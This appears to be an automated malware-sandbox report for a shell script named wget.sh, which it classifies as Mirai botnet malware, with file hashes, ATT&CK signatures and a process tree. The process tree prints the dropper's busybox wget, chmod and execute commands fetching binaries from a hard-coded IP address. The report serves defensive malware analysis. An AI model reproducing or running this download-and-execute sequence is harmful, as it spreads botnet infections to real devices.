Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
19s -
max time network
117s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
10/03/2025, 22:22
Static task
static1
Behavioral task
behavioral1
Sample
wget.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
wget.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
wget.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
wget.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
wget.sh
-
Size
1KB
-
MD5
fe3891afe068ca6fc86017361dfb753c
-
SHA1
d631b6a4eaa99085df4260727c2c86dc82cf5428
-
SHA256
8dcc3e92c112fb94931bd86055dc51f74a70007c058d1571a4eaec583a0852c0
-
SHA512
810560af118bf04a2723fb177bbdf25682e3cb8b95611e15c8d83576305ea41ba11dec0d42c410fc5b287cb8a31901f9190946e957ac8deb8c0d634a42334951
Malware Config
Extracted
mirai
BOTNET
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 4 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 723 busybox 738 busybox 749 busybox 755 busybox -
Executes dropped EXE 4 IoCs
ioc pid Process /tmp/jklarm 725 wget.sh /tmp/jklarm5 739 wget.sh /tmp/jklarm6 750 wget.sh /tmp/jklarm7 756 wget.sh -
Writes file to tmp directory 4 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/jklarm busybox File opened for modification /tmp/jklarm5 busybox File opened for modification /tmp/jklarm6 busybox File opened for modification /tmp/jklarm7 busybox
Processes
-
/tmp/wget.sh/tmp/wget.sh1⤵
- Executes dropped EXE
PID:712 -
/bin/busybox/bin/busybox wget http://176.65.134.5/jklarm -O jklarm2⤵
- Writes file to tmp directory
PID:713
-
-
/bin/busybox/bin/busybox chmod +x jklarm2⤵
- File and Directory Permissions Modification
PID:723
-
-
/tmp/jklarm./jklarm telnet2⤵PID:725
-
-
/bin/busybox/bin/busybox rm -rf jklarm2⤵PID:728
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklarm5 -O jklarm52⤵
- Writes file to tmp directory
PID:730
-
-
/bin/busybox/bin/busybox chmod +x jklarm52⤵
- File and Directory Permissions Modification
PID:738
-
-
/tmp/jklarm5./jklarm5 telnet2⤵PID:739
-
-
/bin/busybox/bin/busybox rm -rf jklarm52⤵PID:741
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklarm6 -O jklarm62⤵
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox chmod +x jklarm62⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/jklarm6./jklarm6 telnet2⤵PID:750
-
-
/bin/busybox/bin/busybox rm -rf jklarm62⤵PID:753
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklarm7 -O jklarm72⤵
- Writes file to tmp directory
PID:754
-
-
/bin/busybox/bin/busybox chmod +x jklarm72⤵
- File and Directory Permissions Modification
PID:755
-
-
/tmp/jklarm7./jklarm7 telnet2⤵PID:756
-
-
/bin/busybox/bin/busybox rm -rf jklarm72⤵PID:758
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklm68k -O jklm68k2⤵PID:759
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60KB
MD535c215d8e2b2ea03a8a191fb3723195a
SHA1c38bcfc3d7050edeff1b7dbffd85d07348bb01e9
SHA256c4fd68b20997f3c8a60dbadf177b3309d465f0a8bb0ad9b33b4c70ee74dc3a90
SHA512ea5a9fda95965b6eb55c47eefe2b42a9234d13c8d05556e72e916f98a626a0a835fa7f7828d4051b6056d639b06bec0136afa9ac3157736702b94c0ed9effdf8
-
Filesize
60KB
MD5a04040c769cad786555e183ba8ae0ca0
SHA1a89d6b50a8140dddce29595c64949214e65c84f1
SHA2567568e9e64ac1105cdcae20095154214ee943b2edc6c01e6d4b4eb0b7e06255a3
SHA512e152f552b99683b3bf9b9fee2f7d34027a291e02dd2f912620593e714774cfe07e14aa837cdb2f2a300d35b721dfd67e7012955e24352bdad0ffecb4e61ed162
-
Filesize
69KB
MD59e18604aa4c5bedd6e9ea6690b751880
SHA1c1f32fe93aa650f9920fc5bd659d23621ab034a2
SHA25641342a887d2be09cf0165913b43a5916492e677d20429068d4829a090453ccbb
SHA512cdafb3281bcaa5f5c1af71df8d53c2d022de72a559dfea513b41bc08c7d8fe421839cfdc51b3f93f501bb62d02924e3047208e8bce3a8768af2404f3caa767b0
-
Filesize
82KB
MD5a9675614a267473cb83e195d9074a067
SHA1a4d148cf841fc2b84c8bb3dd322e40f601532875
SHA256fe4e8d464b7849a5483782d0c47e53deaf199e284badad12ed98ca79e47a79d9
SHA5128adcc5df013328218823d3310bcc4f27f6e1e9e51de2e7ecd5521873f5ac6cc2315f9136e1599f1da4114e65eaed23449e78f9ce04062243aa8ec793086b1c28